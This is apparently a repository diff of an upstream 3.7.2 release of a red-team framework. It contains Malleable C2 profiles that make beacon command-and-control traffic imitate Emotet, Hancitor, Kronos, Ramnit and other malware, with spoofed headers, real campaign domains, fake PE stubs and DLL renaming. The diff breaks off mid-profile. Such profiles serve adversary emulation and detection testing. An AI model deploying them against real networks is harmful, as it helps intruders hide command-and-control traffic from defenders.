New upstream version 3.7.2
Sophie Brun
3 years ago
0 | 2/5/2021 | |
1 | ------------ | |
2 | - Version 3.7.2 Master Release | |
3 | - Fixed Malleable C2 issue where netbios/netbiosu transformations used excessive resources (@Cx01N) | |
4 | - Fixed error when loading http_hop listener options (@Cx01N) | |
5 | ||
0 | 6 | 1/27/2021 |
7 | ------------ | |
1 | 8 | - Version 3.7.1 Master Release |
2 | 9 | - Added Kali message to main menu |
3 | 10 |
0 | # | |
1 | # Asprox botnet traffic profile | |
2 | # http://www.trendmicro.com/cloud-content/us/pdfs/security-intelligence/white-papers/wp-asprox-reborn.pdf | |
3 | # | |
4 | # Author: @harmj0y | |
5 | # | |
6 | set sample_name "Asprox Botnet"; | |
7 | ||
8 | set sleeptime "30000"; # use a ~30s delay between callbacks | |
9 | set jitter "20"; # throw in a 10% jitter | |
10 | set maxdns "255"; | |
11 | set useragent "Mozilla/4.0 (compatible; MSIE 6.0b; Windows NT 5.0; .NET CLR 1.0.2914)"; | |
12 | ||
13 | http-get { | |
14 | ||
15 | set uri "/"; | |
16 | ||
17 | client { | |
18 | ||
19 | header "Accept" "*/*"; | |
20 | header "Content-Type" "application/x-www-form-urlencoded"; | |
21 | header "Content-Transfer-Encoding" "base64"; | |
22 | header "Connection" "Keep-Alive"; | |
23 | ||
24 | metadata { | |
25 | netbiosu; | |
26 | uri-append; | |
27 | } | |
28 | } | |
29 | ||
30 | server { | |
31 | ||
32 | header "Server" "nginx/1.2.5"; | |
33 | header "Content-Type" "text/html"; | |
34 | header "X-Powered-By" "PHP/5.4.4-7"; | |
35 | header "Vary" "Accept-Encoding"; | |
36 | ||
37 | output { | |
38 | base64; | |
39 | print; | |
40 | } | |
41 | } | |
42 | } | |
43 | ||
44 | http-post { | |
45 | ||
46 | # random hash to try to simulate the post uri in the report | |
47 | set uri "/78dc91f1A716DBBAA9E4E12C884C1CB1C27FFF2BEEED7DF1"; | |
48 | ||
49 | client { | |
50 | ||
51 | header "Accept" "*/*"; | |
52 | header "Content-Type" "application/x-www-form-urlencoded"; | |
53 | header "Content-Transfer-Encoding" "base64"; | |
54 | header "Connection" "Keep-Alive"; | |
55 | ||
56 | id { | |
57 | parameter "id"; | |
58 | } | |
59 | ||
60 | output { | |
61 | base64; | |
62 | print; | |
63 | } | |
64 | } | |
65 | ||
66 | server { | |
67 | ||
68 | header "Server" "nginx/1.2.5"; | |
69 | header "Content-Type" "text/html"; | |
70 | header "X-Powered-By" "PHP/5.4.4-7"; | |
71 | header "Vary" "Accept-Encoding"; | |
72 | ||
73 | output { | |
74 | base64; | |
75 | print; | |
76 | } | |
77 | } | |
78 | } | |
79 |
0 | #emotet | |
1 | #mostly taken from --> http://www.broadanalysis.com/2017/08/14/emotet-banking-trojan-2017-08-14-malspam/ | |
2 | #found this regarding the encoded 'cookie' string --> https://www.cisecurity.org/emotet-changes-ttp-and-arrives-in-united-states/ | |
3 | #xx0hcd | |
4 | ||
5 | ||
6 | set sleeptime "30000"; | |
7 | set jitter "20"; | |
8 | set useragent "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; Media Center PC 6.0)"; | |
9 | set dns_idle "8.8.8.8"; | |
10 | set maxdns "235"; | |
11 | ||
12 | ||
13 | http-get { | |
14 | ||
15 | set uri "/LSnmkxT/"; | |
16 | ||
17 | client { | |
18 | ||
19 | header "Host" "trevorcameron.com"; | |
20 | header "Connection" "Keep-Alive"; | |
21 | ||
22 | ||
23 | metadata { | |
24 | netbios; | |
25 | header "Cookie"; | |
26 | ||
27 | ||
28 | } | |
29 | ||
30 | ||
31 | } | |
32 | ||
33 | server { | |
34 | ||
35 | header "Server" "Apache"; | |
36 | header "Cache-Control" "no-cache, no-store, max-age=0, must-revalidate"; | |
37 | header "Pragma" "no-cache"; | |
38 | header "Content-Disposition" "attachment; filename='NFccF.exe'"; | |
39 | header "Content-Transfer-Encoding" "binary"; | |
40 | header "Keep-Alive" "timeout=2, max=100"; | |
41 | header "Connection" "Keep-Alive"; | |
42 | ||
43 | ||
44 | output { | |
45 | netbios; | |
46 | ||
47 | prepend "11f10 | |
48 | MZ......................@............................................. .!..L.!This program cannot be run in DOS mode. | |
49 | ||
50 | $.......h.+.,OE.,OE.,OE..... OE......OE.....1OE...F.:[email protected].%7..%OE.,OD.[OE...L.-OE.....-OE...G.-OE.Rich,OE.........PE..L......Y.............................]."; | |
51 | ||
52 | append "9(90989<9D9X9x9.9.9.9.9.: :@:`:.:.:.:.:.:.:.;(;H;h;.;.;.;.;.;.<(<H<h<.<.<.<.<.=(=H=h=.=.=.=.=.=.>(>D>H>P>X>`>t>|>.>.>.>.>.>.>.>.>.>.>.>.>.>.>.?.?.?.? ?4?<?P?..........p1t1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1(2X2h2x2.2.2.2.2.2.2.2.2p3t3.8.9.9.9.:0:P:h:.:.:.:.;0;;x;.;.;.;.;.<D<h<.<.<.<(=D=d=.=.=.=.>........................................................................................................................................................................................................................................................................................................ | |
53 | 0"; | |
54 | print; | |
55 | } | |
56 | } | |
57 | } | |
58 | ||
59 | http-post { | |
60 | ||
61 | set uri "/LSnmkXT/"; | |
62 | ||
63 | client { | |
64 | ||
65 | header "Host" "77.244.37:7080"; | |
66 | header "Connection" "Keep-Alive"; | |
67 | header "Cache-Control" "no-cache"; | |
68 | ||
69 | output { | |
70 | netbios; | |
71 | print; | |
72 | ||
73 | } | |
74 | ||
75 | #not sure where to stick this to look good... | |
76 | id { | |
77 | base64url; | |
78 | header "Cookie"; | |
79 | ||
80 | } | |
81 | } | |
82 | ||
83 | server { | |
84 | ||
85 | header "Server" "nginx"; | |
86 | header "Content-Type" "text/html; charset=UTF-8"; | |
87 | header "Connection" "keep-alive"; | |
88 | ||
89 | ||
90 | output { | |
91 | netbios; | |
92 | print; | |
93 | } | |
94 | } | |
95 | } | |
96 | ||
97 | http-stager { | |
98 | ||
99 | set uri_x86 "/ckgawd/"; | |
100 | set uri_x64 "/Ckgawd/"; | |
101 | ||
102 | client { | |
103 | header "Host" "blushphotoandfilm.com"; | |
104 | header "Connection" "Keep-Alive"; | |
105 | } | |
106 | ||
107 | server { | |
108 | header "Cache-Control" "Cache-Control: no-cache, no-store, max-age=0, must-revalidate"; | |
109 | header "Content-Type" "application/octet-stream"; | |
110 | header "Server" "Apache"; | |
111 | header "Connection" "Keep-Alive"; | |
112 | ||
113 | } | |
114 | ||
115 | ||
116 | } | |
117 | #from link in doc --> https://www.virustotal.com/#/file/17ced37ec7b9a02b142f5ca527e1bba05c723231b3d4fc1a951e45ec002a17e5/details | |
118 | stage { | |
119 | set compile_time "11 Nov 2010 23:29:33"; | |
120 | set userwx "false"; | |
121 | set image_size_x86 "298000"; | |
122 | ||
123 | #some dll names seen by --> https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?Name=Trojan:Win32/Emotet.N!bit | |
124 | transform-x86 { | |
125 | strrep "beacon.dll" "api32.dll"; | |
126 | } | |
127 | ||
128 | transform-x64 { | |
129 | strrep "beacon.x64.dll" "mgr32.dll"; | |
130 | } | |
131 | ||
132 | #https://github.com/Yara-Rules/rules/blob/master/malware/MALW_Emotet.yar | |
133 | stringw "{ 4d 5a }"; | |
134 | stringw "{ 0f 45 fb 0f 45 de }"; | |
135 | stringw "{ C7 04 24 00 00 00 00 89 44 24 0? }"; | |
136 | stringw "{ 89 E? 8D ?? 24 ?? 89 ?? FF D0 83 EC 04 }"; | |
137 | ||
138 | } |
0 | # | |
1 | # Fiesta Exploit Kit traffic profile | |
2 | # http://malware-traffic-analysis.net/2014/04/05/index.html | |
3 | # | |
4 | # Author: @harmj0y | |
5 | # | |
6 | ||
7 | set sleeptime "30000"; # use a ~30s delay between callbacks | |
8 | set jitter "10"; # throw in a 10% jitter | |
9 | set maxdns "255"; | |
10 | set useragent "Mozilla/4.0 (Windows 7 6.1) Java/1.7.0_11"; | |
11 | ||
12 | http-get { | |
13 | ||
14 | set uri "/rmvk30g/"; | |
15 | ||
16 | client { | |
17 | # mimic this Fiesta instance's header information | |
18 | header "Accept" "text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2"; | |
19 | header "Connection" "keep-alive"; | |
20 | ||
21 | # encode session metadata as close as we can to a Fiesta URI request | |
22 | metadata { | |
23 | netbios; | |
24 | append ";1;4;1"; | |
25 | uri-append; | |
26 | } | |
27 | } | |
28 | ||
29 | server { | |
30 | header "Server" "Apache/2.2.15 (CentOS)"; | |
31 | header "X-Powered-By" "PHP/5.3.27"; | |
32 | header "Content-Type" "application/octet-stream"; | |
33 | header "Connection" "close"; | |
34 | ||
35 | output { | |
36 | print; | |
37 | } | |
38 | } | |
39 | } | |
40 | ||
41 | http-post { | |
42 | ||
43 | set uri "/"; | |
44 | ||
45 | client { | |
46 | ||
47 | # fake out a different user agent for the post back | |
48 | header "User-Agent" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/6.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; InfoPath.3; .NET4.0C; .NET4.0E)"; | |
49 | ||
50 | id { | |
51 | netbios; | |
52 | uri-append; | |
53 | } | |
54 | ||
55 | output { | |
56 | base64; | |
57 | print; | |
58 | } | |
59 | } | |
60 | ||
61 | server { | |
62 | header "Server" "nginx/1.4.2"; | |
63 | header "Content-Type" "text/html"; | |
64 | header "Connection" "close"; | |
65 | ||
66 | output { | |
67 | base64; | |
68 | print; | |
69 | } | |
70 | } | |
71 | } | |
72 |
0 | # | |
1 | # A second Fiesta Exploit Kit traffic profile | |
2 | # http://malware-traffic-analysis.net/2014/04/05/index.html | |
3 | # | |
4 | # Author: @harmj0y | |
5 | # | |
6 | set sample_name "Fiesta Exploit Kit"; | |
7 | ||
8 | set sleeptime "30000"; # use a ~30s delay between callbacks | |
9 | set jitter "10"; # throw in a 10% jitter | |
10 | set maxdns "255"; | |
11 | ||
12 | http-get { | |
13 | ||
14 | set uri "/v20idaf/"; | |
15 | ||
16 | client { | |
17 | # mimic this Fiesta instance's header information | |
18 | header "Accept" "*/*"; | |
19 | header "User-Agent" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)"; | |
20 | ||
21 | # encode session metadata as close as we can to a Fiesta URI request | |
22 | metadata { | |
23 | netbios; | |
24 | append ";112202;228"; | |
25 | uri-append; | |
26 | } | |
27 | } | |
28 | ||
29 | server { | |
30 | header "Server" "nginx/1.4.4"; | |
31 | header "Content-Type" "application/octet-stream"; | |
32 | header "Connection" "close"; | |
33 | ||
34 | output { | |
35 | print; | |
36 | } | |
37 | } | |
38 | } | |
39 | ||
40 | http-post { | |
41 | ||
42 | set uri "/"; | |
43 | ||
44 | client { | |
45 | ||
46 | header "Accept" "*/*"; | |
47 | header "User-Agent" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)"; | |
48 | ||
49 | id { | |
50 | netbios; | |
51 | uri-append; | |
52 | } | |
53 | ||
54 | output { | |
55 | base64; | |
56 | print; | |
57 | } | |
58 | } | |
59 | ||
60 | server { | |
61 | header "Server" "nginx/1.4.4"; | |
62 | header "Content-Type" "application/octet-stream"; | |
63 | header "Connection" "close"; | |
64 | ||
65 | output { | |
66 | print; | |
67 | } | |
68 | } | |
69 | } | |
70 |
0 | #GlobeImposter ransomware | |
1 | #taken from --> http://www.malware-traffic-analysis.net/2017/11/30/index.html | |
2 | #xx0hcd | |
3 | ||
4 | set sleeptime "30000"; | |
5 | set jitter "20"; | |
6 | set useragent "Mozilla Firefox/4.0(compatible; MSIE 7.0; Windows NT 6.1; Trident/7.0;SLC2; .NET CLD 3.5.30729; Media Center PC 6.0;)"; | |
7 | set dns_idle "8.8.8.8"; | |
8 | set maxdns "235"; | |
9 | ||
10 | ||
11 | http-get { | |
12 | ||
13 | set uri "/JHGcd476334"; | |
14 | ||
15 | client { | |
16 | ||
17 | header "Accept" "*/*"; | |
18 | header "Accept-Encoding" "gzip, deflate"; | |
19 | header "Host" "awholeblueworld.com"; | |
20 | header "Connection" "Keep-Alive"; | |
21 | ||
22 | ||
23 | metadata { | |
24 | base64url; | |
25 | header "Cookie"; | |
26 | ||
27 | } | |
28 | ||
29 | ||
30 | } | |
31 | ||
32 | server { | |
33 | ||
34 | header "Server" "nginx"; | |
35 | header "Content-Type" "text/plain"; | |
36 | header "Connection" "keep-alive"; | |
37 | header "Vary" "Accept-Encoding"; | |
38 | header "X-Powered-By" "PleskLin"; | |
39 | header "Content-Encoding" "gzip"; | |
40 | ||
41 | ||
42 | output { | |
43 | ||
44 | netbios; | |
45 | prepend "500a ...............|T..?~.G..a.I H. AQ...J..."; | |
46 | print; | |
47 | } | |
48 | } | |
49 | } | |
50 | ||
51 | http-post { | |
52 | set verb "GET"; | |
53 | set uri "/count.php"; | |
54 | ||
55 | client { | |
56 | ||
57 | header "Accept" "*/*"; | |
58 | header "Accept-Encoding" "gzip, deflate"; | |
59 | header "Host" "awholeblueworld.com"; | |
60 | header "Connection" "Keep-Alive"; | |
61 | ||
62 | output { | |
63 | base64url; | |
64 | parameter "nu"; | |
65 | ||
66 | ||
67 | ||
68 | } | |
69 | ||
70 | ||
71 | id { | |
72 | base64url; | |
73 | parameter "fb"; | |
74 | ||
75 | } | |
76 | ||
77 | # parameter "fb" "110"; | |
78 | ||
79 | } | |
80 | ||
81 | server { | |
82 | ||
83 | header "Server" "nginx"; | |
84 | header "Content-Type" "text/plain"; | |
85 | header "Connection" "keep-alive"; | |
86 | header "Vary" "Accept-Encoding"; | |
87 | header "X-Powered-By" "PleskLin"; | |
88 | header "Content-Encoding" "gzip"; | |
89 | ||
90 | ||
91 | output { | |
92 | netbios; | |
93 | prepend "500a ...............|T..?~.G..a.I H. AQ...J..."; | |
94 | print; | |
95 | } | |
96 | ||
97 | } | |
98 | } | |
99 | ||
100 | http-stager { | |
101 | ||
102 | set uri_x86 "/JHGCd476334"; | |
103 | set uri_x64 "/JHGcD476334"; | |
104 | ||
105 | ||
106 | client { | |
107 | ||
108 | header "Host" "awholeblueworld"; | |
109 | header "Connection" "keep-alive"; | |
110 | ||
111 | } | |
112 | ||
113 | server { | |
114 | ||
115 | header "Server" "nginx"; | |
116 | header "Content-Type" "text/plain"; | |
117 | header "Connection" "keep-alive"; | |
118 | header "Vary" "Accept-Encoding"; | |
119 | header "X-Powered-By" "PleskLin"; | |
120 | header "Content-Encoding" "gzip"; | |
121 | ||
122 | ||
123 | output { | |
124 | ||
125 | print; | |
126 | } | |
127 | ||
128 | } | |
129 | ||
130 | ||
131 | } | |
132 | ||
133 | stage { | |
134 | set userwx "true"; | |
135 | set compile_time "03 Feb 2016 09:17:32"; | |
136 | set image_size_x86 "448012"; | |
137 | set image_size_x64 "448012"; | |
138 | #set obfuscate "true"; | |
139 | } |
0 | #hancitor | |
1 | #taken from --> http://www.malware-traffic-analysis.net/2017/12/20/index.html | |
2 | #xx0hcd | |
3 | ||
4 | ||
5 | set sleeptime "30000"; | |
6 | set jitter "20"; | |
7 | set useragent "Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko)"; | |
8 | set dns_idle "8.8.8.8"; | |
9 | set maxdns "235"; | |
10 | ||
11 | ||
12 | http-get { | |
13 | ||
14 | set uri "/mlu/forum.php"; | |
15 | ||
16 | client { | |
17 | ||
18 | header "Host" "arrepsinrab.com"; | |
19 | header "Accept" "*/*"; | |
20 | header "Accept-Encoding" "identity, *;q=0"; | |
21 | header "Accept-Language" "en-US"; | |
22 | header "Content-Type" "application/octet-stream"; | |
23 | header "Connection" "close"; | |
24 | header "Content-Encoding" "binary"; | |
25 | ||
26 | ||
27 | metadata { | |
28 | netbios; | |
29 | header "Cookie"; | |
30 | ||
31 | ||
32 | } | |
33 | ||
34 | ||
35 | } | |
36 | ||
37 | server { | |
38 | ||
39 | header "Server" "nginx/1.10.2"; | |
40 | header "Content-Type" "text/html"; | |
41 | header "Keep-Alive" "timeout=2, max=100"; | |
42 | header "Connection" "close"; | |
43 | header "X-Powered-By" "PHP/5.4.45"; | |
44 | ||
45 | ||
46 | output { | |
47 | netbios; | |
48 | print; | |
49 | } | |
50 | } | |
51 | } | |
52 | ||
53 | http-post { | |
54 | ||
55 | set uri "/ls5/forum.php"; | |
56 | ||
57 | client { | |
58 | ||
59 | header "Accept" "*/*"; | |
60 | header "Content-Type" "application/x-www-form-urlencoded"; | |
61 | header "Host" "gedidnundno.com"; | |
62 | header "Cache-Control" "no-cache"; | |
63 | ||
64 | output { | |
65 | netbios; | |
66 | print; | |
67 | ||
68 | } | |
69 | ||
70 | ||
71 | id { | |
72 | netbiosu; | |
73 | header "GUID"; | |
74 | ||
75 | } | |
76 | } | |
77 | ||
78 | server { | |
79 | ||
80 | header "Server" "nginx/1.10.2"; | |
81 | header "Content-Type" "text/html"; | |
82 | header "Transfer-Encoding" "chunked"; | |
83 | header "Connection" "keep-alive"; | |
84 | header "X-Powered-By" "PHP/5.4.45"; | |
85 | ||
86 | ||
87 | output { | |
88 | netbios; | |
89 | print; | |
90 | } | |
91 | } | |
92 | } | |
93 | ||
94 | http-stager { | |
95 | ||
96 | set uri_x86 "/lS5/forum.php"; | |
97 | set uri_x64 "/ls5/Forum.php"; | |
98 | ||
99 | client { | |
100 | header "Accept" "text/html, application/xhtml+xml, */*"; | |
101 | header "Accept-Language" "en-US"; | |
102 | header "Host" "acamonitoringltd.ca"; | |
103 | header "Connection" "Keep-Alive"; | |
104 | } | |
105 | ||
106 | server { | |
107 | header "Server" "nginx"; | |
108 | header "Content-Type" "application/msword;"; | |
109 | header "Keep-Alive" "timeout=2, max=100"; | |
110 | header "Connection" "Keep-Alive"; | |
111 | header "X-Powered-By" "PHP/5.3.3"; | |
112 | header "Content-Disposition" "attachment; filename=fax_286509.doc"; | |
113 | header "Pragma" "private"; | |
114 | ||
115 | } | |
116 | ||
117 | ||
118 | } | |
119 | ||
120 | stage { | |
121 | #random | |
122 | set compile_time "15 Nov 2017 12:24:14"; | |
123 | set userwx "false"; | |
124 | set image_size_x86 "301000"; | |
125 | ||
126 | #https://www.fireeye.com/blog/threat-research/2016/09/hancitor_aka_chanit.html | |
127 | transform-x86 { | |
128 | strrep "beacon.dll" "pm.dll"; | |
129 | } | |
130 | ||
131 | transform-x64 { | |
132 | strrep "beacon.x64.dll" "PM.dll"; | |
133 | } | |
134 | ||
135 | #https://github.com/Yara-Rules/rules/blob/d1da9c002d1d00045f53ea1502cfcc7dd43c115e/Malicious_Documents/Maldoc_hancitor_dropper | |
136 | stringw "{ 00 56 69 72 74 75 61 6C 41 6C 6C 6F 63 00 }"; | |
137 | stringw "{ 00 52 74 6C 4D 6F 76 65 4D 65 6D 6F 72 79 00 }"; | |
138 | stringw "{ 00 43 61 6C 6C 57 69 6E 64 6F 77 50 72 6F 63 41 00 }"; | |
139 | stringw "{ 50 4F 4C 41 }"; | |
140 | ||
141 | } |
0 | #kronos | |
1 | #https://blog.malwarebytes.com/cybercrime/2017/08/inside-kronos-malware/ | |
2 | #https://blog.malwarebytes.com/cybercrime/2017/08/inside-kronos-malware-p2/ | |
3 | #https://www.hybrid-analysis.com/sample/8389dd850c991127f3b3402dce4201cb693ec0fb7b1e7663fcfa24ef30039851?environmentId=100 | |
4 | #xx0hcd | |
5 | ||
6 | ||
7 | set sleeptime "30000"; | |
8 | set jitter "20"; | |
9 | set useragent "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/32.0.1667.0 Safari/537.36"; | |
10 | set dns_idle "8.8.8.8"; | |
11 | set maxdns "235"; | |
12 | ||
13 | ||
14 | http-get { | |
15 | ||
16 | set uri "/lampi/upload/38bacf4f.exe"; | |
17 | ||
18 | client { | |
19 | ||
20 | header "Host" "hjbkjbhkjhbkjhl.info"; | |
21 | ||
22 | ||
23 | metadata { | |
24 | base64url; | |
25 | prepend "PHPSESSID="; | |
26 | header "Cookie"; | |
27 | ||
28 | } | |
29 | ||
30 | } | |
31 | ||
32 | server { | |
33 | ||
34 | header "Server" "nginx/1.10.2"; | |
35 | header "Content-Type" "application/octet-stream"; | |
36 | header "Connection" "close"; | |
37 | header "ETag" "2ca0669-6d600-557bba73d8218"; | |
38 | header "Accept-Ranges" "bytes"; | |
39 | ||
40 | output { | |
41 | ||
42 | netbios; | |
43 | prepend "MZ....................@..........................!......L..!This Program cannot be run in DOS mode.$...................~........:.....:.....:.....7.{.-...7.D.H..7.E..."; | |
44 | ||
45 | print; | |
46 | } | |
47 | } | |
48 | } | |
49 | ||
50 | http-post { | |
51 | ||
52 | set uri "/lampi/connect.php"; | |
53 | ||
54 | client { | |
55 | ||
56 | header "Host" "hjbkjbhkjhbkjhl.info"; | |
57 | header "Cache-Control" "no-cache"; | |
58 | ||
59 | output { | |
60 | base64url; | |
61 | prepend "PHPSESSID="; | |
62 | ||
63 | header "Cookie"; | |
64 | ||
65 | ||
66 | } | |
67 | ||
68 | ||
69 | id { | |
70 | base64url; | |
71 | parameter "a"; | |
72 | ||
73 | } | |
74 | } | |
75 | ||
76 | server { | |
77 | ||
78 | header "Server" "nginx/1.10.2"; | |
79 | header "Content-Type" "text/html; charset=windows-1251"; | |
80 | header "X-Powered-By" "PHP/5.3.3"; | |
81 | header "Cache-Control" "no-store, non-cache, must-revalidate, post-check=0, pre-check=0"; | |
82 | header "Pragma" "non-cache"; | |
83 | ||
84 | ||
85 | output { | |
86 | netbios; | |
87 | ||
88 | print; | |
89 | } | |
90 | } | |
91 | } | |
92 | ||
93 | http-stager { | |
94 | ||
95 | set uri_x86 "/lampi/Connect.php"; | |
96 | set uri_x64 "/Lampi/connect.php"; | |
97 | ||
98 | client { | |
99 | header "Host" "hjbkjbhkjhbkjhl.info"; | |
100 | header "Cache-Control" "no-cache"; | |
101 | } | |
102 | ||
103 | server { | |
104 | header "Server" "nginx/1.10.2"; | |
105 | header "Content-Type" "text/html; charset=windows-1251"; | |
106 | header "X-Powered-By" "PHP/5.3.3"; | |
107 | header "Cache-Control" "no-store, non-cache, must-revalidate, post-check=0, pre-check=0"; | |
108 | header "Pragma" "non-cache"; | |
109 | ||
110 | } | |
111 | ||
112 | ||
113 | } | |
114 | ||
115 | ||
116 | ||
117 | #from peclone | |
118 | stage { | |
119 | set checksum "0"; | |
120 | set compile_time "23 Aug 2017 10:19:26"; | |
121 | set entry_point "37713"; | |
122 | set image_size_x86 "495616"; | |
123 | set image_size_x64 "495616"; | |
124 | set rich_header "\x07\x4f\x6b\x48\x43\x2e\x05\x1b\x43\x2e\x05\x1b\x43\x2e\x05\x1b\xf7\xb2\xf4\x1b\x49\x2e\x05\x1b\xf7\xb2\xf6\x1b\xc2\x2e\x05\x1b\xf7\xb2\xf7\x1b\x5a\x2e\x05\x1b\x78\x70\x06\x1a\x51\x2e\x05\x1b\x78\x70\x01\x1a\x51\x2e\x05\x1b\x78\x70\x00\x1a\x66\x2e\x05\x1b\x4a\x56\x96\x1b\x44\x2e\x05\x1b\x43\x2e\x04\x1b\x21\x2e\x05\x1b\xd4\x70\x0c\x1a\x42\x2e\x05\x1b\xd1\x70\xfa\x1b\x42\x2e\x05\x1b\xd4\x70\x07\x1a\x42\x2e\x05\x1b\x52\x69\x63\x68\x43\x2e\x05\x1b\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"; | |
125 | } | |
126 | ||
127 | ||
128 |
0 | #ramnit trojan | |
1 | #combines traffic seen from seamless campaign | |
2 | #taken from --> https://malwarebreakdown.com/2018/01/16/rig-exploit-kit-delivers-ramnit-banking-trojan-via-seamless-malvertising-campaign/ | |
3 | #xx0hcd | |
4 | ||
5 | ||
6 | set sleeptime "30000"; | |
7 | set jitter "20"; | |
8 | set useragent "Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko)"; | |
9 | set dns_idle "8.8.8.8"; | |
10 | set maxdns "235"; | |
11 | ||
12 | ||
13 | http-get { | |
14 | ||
15 | set uri "/redirect"; | |
16 | ||
17 | client { | |
18 | ||
19 | header "Accept" "text/html, application/xhtml+xml, */*"; | |
20 | header "Accept-Language" "en-US"; | |
21 | header "Accept-Encoding" "gzip, deflate"; | |
22 | header "Host" "redirect.turself-josented.com"; | |
23 | header "Connection" "Keep-Alive"; | |
24 | ||
25 | ||
26 | ||
27 | metadata { | |
28 | netbios; | |
29 | parameter "target"; | |
30 | ||
31 | ||
32 | } | |
33 | ||
34 | ||
35 | } | |
36 | ||
37 | server { | |
38 | ||
39 | header "Server" "nginx"; | |
40 | header "Content-Type" "text/html;charset=UTF-8"; | |
41 | header "Connection" "keep-alive"; | |
42 | header "Cache-Control" "no-store, no-cache, pre-check=0, post-check=0"; | |
43 | header "Expires" "Thu, 01 Jan 1970 00:00:00 GMT"; | |
44 | header "Pragma" "no-cache"; | |
45 | ||
46 | ||
47 | output { | |
48 | base64; | |
49 | prepend "105"; | |
50 | prepend "<html><head><link rel=\"icon\" type=\"image/gif\" href=\"data:image/gif;base64,"; | |
51 | ||
52 | append "\"/><meta http-equiv=\"refresh\" content=\"0;URL='http://xn-b1aanbboc3ad8jee4bff.xn--p1ai/gav4.php'\" /></head><body></body></html>"; | |
53 | ||
54 | print; | |
55 | } | |
56 | } | |
57 | } | |
58 | ||
59 | http-post { | |
60 | ||
61 | set uri "/Redirect.php"; | |
62 | ||
63 | client { | |
64 | ||
65 | header "Accept" "*/*"; | |
66 | # header "Content-Type" "application/x-www-form-urlencoded"; | |
67 | # header "X-Requested-With" "XMLHttpRequest"; | |
68 | header "Referer" "http://........../redirect.php?acsc=93042904"; | |
69 | header "Accept-Language" "en-US"; | |
70 | header "Host" "xn--b1aanbboc3ad8jee4bff.xn--p1ai"; | |
71 | # header "Connection" "Keep-Alive"; | |
72 | ||
73 | output { | |
74 | netbios; | |
75 | print; | |
76 | ||
77 | } | |
78 | ||
79 | ||
80 | id { | |
81 | netbios; | |
82 | prepend "http://........../redirect.php?acsc="; | |
83 | header "Referer"; | |
84 | ||
85 | } | |
86 | } | |
87 | ||
88 | server { | |
89 | ||
90 | header "Server" "nginx"; | |
91 | header "Content-Type" "text/html, charset=UTF-8"; | |
92 | header "Connection" "keep-alive"; | |
93 | header "Vary" "Accept-Encoding"; | |
94 | header "X-Powered-By" "PHP/5.6.30"; | |
95 | header "Cache-Control" "no-store, no-cache, must-revalidate, max-age=0"; | |
96 | header "Content-Encoding" "gzip"; | |
97 | ||
98 | ||
99 | output { | |
100 | netbios; | |
101 | print; | |
102 | } | |
103 | } | |
104 | } | |
105 | ||
106 | http-stager { | |
107 | ||
108 | set uri_x86 "/Jump/next.php"; | |
109 | set uri_x64 "/jump/Next.php"; | |
110 | ||
111 | client { | |
112 | header "Accept" "text/html, application/xhtml+xml, */*"; | |
113 | header "Referer" "http://buzzadnetwork.com/jump/next.php?r=1566861&sub1="; | |
114 | header "Accept-Language" "en-US"; | |
115 | header "Accept-Encoding" "gzip, deflate"; | |
116 | header "Host" "www.buzzadnetwork.com"; | |
117 | header "Connection" "Keep-Alive"; | |
118 | } | |
119 | ||
120 | server { | |
121 | header "Server" "openresty"; | |
122 | header "Content-Type" "text/html; charset=utf-8"; | |
123 | header "Keep-Alive" "timeout=2, max=100"; | |
124 | header "Connection" "Keep-Alive"; | |
125 | header "Location" "http://xn--b1aanbboc3ad8jee4bff.xn--p1ai/redirect.php?acsc=93042904"; | |
126 | #has 2 r's in 'referrer' | |
127 | header "Referrer-Policy" "no-referrer"; | |
128 | header "Vary" "Accept-Encoding"; | |
129 | ||
130 | } | |
131 | ||
132 | ||
133 | } | |
134 | ||
135 | stage { | |
136 | #https://www.symantec.com/content/dam/symantec/docs/security-center/white-papers/w32-ramnit-analysis-15-en.pdf | |
137 | set compile_time "09 Jan 2014 12:24:14"; | |
138 | set userwx "false"; | |
139 | set image_size_x86 "316224"; | |
140 | set image_size_x64 "616224"; | |
141 | ||
142 | transform-x86 { | |
143 | strrep "beacon.dll" "rmnsft.dll"; | |
144 | } | |
145 | ||
146 | transform-x64 { | |
147 | strrep "beacon.x64.dll" "RMNSFT.dll"; | |
148 | } | |
149 | ||
150 | #https://github.com/tbarabosch/quincy-complementary-material/blob/master/yara/ramnit.yara | |
151 | stringw "USERPASSCWD CDUPQUITPORTPASVTYPEMODERETRSTORAPPERESTRNFRRNTOABORDELERMD"; | |
152 | stringw "ModuleCode"; | |
153 | stringw "StartRoutine"; | |
154 | stringw "cookies.txt"; | |
155 | ||
156 | } |
0 | #rigEK | |
1 | #taken from --> http://www.malware-traffic-analysis.net/2018/01/30/index.html | |
2 | #xx0hcd | |
3 | ||
4 | ||
5 | set sleeptime "30000"; | |
6 | set jitter "20"; | |
7 | set useragent "Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko)"; | |
8 | set dns_idle "8.8.8.8"; | |
9 | set maxdns "235"; | |
10 | ||
11 | ||
12 | http-get { | |
13 | ||
14 | set uri "/"; | |
15 | ||
16 | client { | |
17 | ||
18 | header "Accept" "text/html, */*"; | |
19 | header "Accept-Language" "en-US"; | |
20 | header "Host" "176.57.208.59"; | |
21 | header "Connection" "Keep-Alive"; | |
22 | ||
23 | ||
24 | ||
25 | metadata { | |
26 | netbios; | |
